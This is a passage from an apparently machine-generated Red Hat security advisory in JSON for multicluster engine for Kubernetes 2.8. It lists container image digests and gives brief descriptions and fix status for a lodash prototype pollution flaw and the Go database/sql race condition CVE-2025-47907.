"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
